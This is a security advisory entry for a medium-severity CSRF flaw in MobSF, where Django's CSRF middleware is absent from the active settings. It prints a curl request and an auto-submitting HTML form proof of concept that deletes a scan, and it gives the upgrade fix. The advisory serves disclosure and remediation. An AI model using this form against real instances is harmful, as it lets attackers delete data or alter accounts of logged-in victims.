VDB
KO
MEDIUM 6.5

GHSA-3p54-567p-2wpr

MobSF's CSRF checks not enforced after Django migration

Quick fix

GHSA-3p54-567p-2wpr — mobsf: upgrade to the fixed version with the command below.

pip install --upgrade 'mobsf>=4.5.1'

Details

### Summary

Django's `CsrfViewMiddleware` exists only in the deprecated `MIDDLEWARE_CLASSES` (ignored since Django 2.0). The active `MIDDLEWARE` tuple does not include it. All authenticated web POST endpoints (delete scan, upload, download APK, change password, manage users) accept requests without CSRF tokens.

### Verified Impact

This was verified by **actually deleting a real scan** from the running server using only a session cookie — no CSRF token was required:

``` $ curl -s -b cookies.txt -X POST "http://127.0.0.1:8000/delete_scan/" \ -d "md5=68e76627798d62555d5287f4488a32c7&scan_type=apk" {"deleted": "yes"} ```

The scan was removed from the database. This attack works from any website via HTML form auto-submission because: - **No CSRF token is validated** (middleware absent) - **Cookie `SameSite=Lax`** allows form-based top-level navigation to send the session cookie

### Affected Component

``` File: mobsf/MobSF/settings.py (Lines 206-212)

MIDDLEWARE = ( 'mobsf.MobSF.views.api.api_middleware.RestApiAuthMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', # MISSING: 'django.middleware.csrf.CsrfViewMiddleware' ) ```

### Steps to Reproduce

**1.** Start MobSF v4.4.6 and log in at `http://127.0.0.1:8000/login/` (creds: `mobsf/mobsf`).

**2.** Upload and scan any APK to create a scan entry. Note the MD5 hash from "Recent Scans".

**3.** Open the following HTML file in the **same browser** (simulates visiting attacker's page):

```html <!DOCTYPE html> <html> <head><title>Innocent Page</title></head> <body> <h1>Loading...</h1> <form id="f" method="POST" action="http://127.0.0.1:8000/delete_scan/"> <input type="hidden" name="md5" value="PUT_REAL_MD5_HASH_HERE" /> <input type="hidden" name="scan_type" value="apk" /> </form> <script>document.getElementById('f').submit();</script> </body> </html> ```

**4.** The scan is deleted. Navigate back to MobSF "Recent Scans" to confirm it's gone.

### Why This Is Not a Self-Bug

- The attack requires a **victim user** who is logged in to visit an attacker-controlled page - The attacker crafts the form targeting the victim's MobSF instance - All destructive POST endpoints are affected: `/delete_scan/`, `/upload/`, `/download_scan/`, `/change_password/`, `/create_user/`, `/delete_user/` - This matches the pattern of previously accepted MobSF advisories (e.g., GHSA-5jc6-h9w7-jm3p, GHSA-8m9j-2f32-2vx4)

### Remediation

Add `'django.middleware.csrf.CsrfViewMiddleware'` to the active `MIDDLEWARE` tuple.

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI / mobsf
Introduced in: 0 Fixed in: 4.5.1
Fix pip install --upgrade 'mobsf>=4.5.1'

References